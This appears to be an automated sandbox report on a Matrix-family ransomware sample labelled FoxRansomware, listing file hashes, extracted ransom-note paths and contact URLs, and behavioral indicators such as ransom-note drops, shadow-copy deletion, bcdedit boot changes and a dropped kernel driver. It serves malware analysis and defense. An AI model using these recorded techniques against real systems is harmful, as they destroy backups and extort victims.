Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
150s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 17:56
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240319-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
-
Size
1.2MB
-
MD5
907636b28d162f7110b067a8178fa38c
-
SHA1
048ae4691fe267e7c8d9eda5361663593747142a
-
SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
-
SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
-
SSDEEP
24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#CORE_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre7\lib\zi\America\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre7\lib\cmm\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\Servers\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Users\Admin\Desktop\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Users\Public\Pictures\Sample Pictures\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\plugins\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre7\lib\deploy\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Users\Admin\Favorites\Microsoft Websites\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Users\All Users\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Sort\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4956 bcdedit.exe 2452 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 1196 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS siPyPOvN64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" siPyPOvN64.exe -
Executes dropped EXE 3 IoCs
pid Process 2620 NWwSQgCp.exe 3008 siPyPOvN.exe 400 siPyPOvN64.exe -
Loads dropped DLL 4 IoCs
pid Process 2956 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 2956 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe 2684 cmd.exe 3008 siPyPOvN.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1628 takeown.exe -
resource yara_rule behavioral7/files/0x0005000000019484-2235.dat upx behavioral7/memory/2684-2237-0x0000000000230000-0x00000000002A7000-memory.dmp upx behavioral7/memory/3008-2307-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\M: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\Q: siPyPOvN64.exe File opened (read-only) \??\U: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\B: siPyPOvN64.exe File opened (read-only) \??\H: siPyPOvN64.exe File opened (read-only) \??\L: siPyPOvN64.exe File opened (read-only) \??\T: siPyPOvN64.exe File opened (read-only) \??\K: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\W: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\L: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\J: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\G: siPyPOvN64.exe File opened (read-only) \??\Z: siPyPOvN64.exe File opened (read-only) \??\Z: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\P: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\N: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\A: siPyPOvN64.exe File opened (read-only) \??\N: siPyPOvN64.exe File opened (read-only) \??\R: siPyPOvN64.exe File opened (read-only) \??\W: siPyPOvN64.exe File opened (read-only) \??\V: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\H: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\E: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\K: siPyPOvN64.exe File opened (read-only) \??\P: siPyPOvN64.exe File opened (read-only) \??\U: siPyPOvN64.exe File opened (read-only) \??\Q: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\R: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\I: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\G: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\E: siPyPOvN64.exe File opened (read-only) \??\J: siPyPOvN64.exe File opened (read-only) \??\Y: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\V: siPyPOvN64.exe File opened (read-only) \??\X: siPyPOvN64.exe File opened (read-only) \??\Y: siPyPOvN64.exe File opened (read-only) \??\S: siPyPOvN64.exe File opened (read-only) \??\T: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\O: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\I: siPyPOvN64.exe File opened (read-only) \??\M: siPyPOvN64.exe File opened (read-only) \??\O: siPyPOvN64.exe File opened (read-only) \??\X: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\DjD57Lbc.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice-install.log 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\pl.pak 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Casablanca 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre7\lib\zi\America\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18192_.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02252_.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Paris 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_underline.gif 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_SelectionSubpicture.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port-au-Prince 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200273.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21327_.GIF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01628_.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Maldives 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01793_.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00736_.WMF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSHY7EN.LEX 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-next-static.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\ACT3R.SAM 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\shatter.png 